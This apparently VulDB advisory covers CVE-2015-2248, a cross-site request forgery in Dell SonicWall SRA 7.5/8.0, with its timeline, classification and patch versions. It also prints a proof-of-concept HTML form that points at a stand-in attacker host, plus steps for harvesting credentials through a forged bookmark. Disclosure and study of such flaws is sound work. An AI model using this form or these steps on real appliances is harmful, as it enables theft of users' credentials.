Details
A vulnerability was found in Dell SonicWall Secure Remote Access Appliance 7.5/8.0 (Remote Access Software). It has been classified as problematic. This affects an unknown functionality of the file /cgi-bin/editBookmark. The manipulation with an unknown input leads to a cross-site request forgery vulnerability. CWE is classifying the issue as CWE-352. The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. This is going to have an impact on confidentiality, integrity, and availability.
The bug was discovered 01/20/2015. The weakness was released 04/28/2015 by Veit Hailperin with scip AG as sID 75111 as confirmed entry (scip VulDB). It is possible to read the advisory at scip.ch. The public release was coordinated with Dell. This vulnerability is uniquely identified as CVE-2015-2248 since 03/09/2015. It is possible to initiate the attack remotely. No form of authentication is needed for exploitation. It demands that the victim is doing some kind of user interaction. Technical details and a public exploit are known.
A public exploit has been developed by Veit Hailperin in HTML and been published immediately after the advisory. The exploit is shared for download at packetstormsecurity.com. It is declared as proof-of-concept. The vulnerability was handled as a non-public zero-day exploit for at least 87 days. During that time the estimated underground price was around $5k-$25k. The code used by the exploit is:
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/http"> <input type="hidden" name="HOST" value="www.malicious-host.tld" /> <input type="hidden" name="bookmarkAccessed" value="4" /> <input type="submit" value="Submit request" /> </form>The advisory illustrates:
1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker. 2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay. 3. Gather the credentials on the target server provided in step #1
Applying the patch 7.5.1.0-38sv/8.0.0.1-16sv is able to eliminate this problem. A possible mitigation has been published before and not just after the disclosure of the vulnerability.
The vulnerability is also documented in the databases at X-Force (102844), Exploit-DB (36940), SecurityFocus (BID 73098†) and SecurityTracker (ID 1032227†). Be aware that VulDB is the high quality source for vulnerability data.
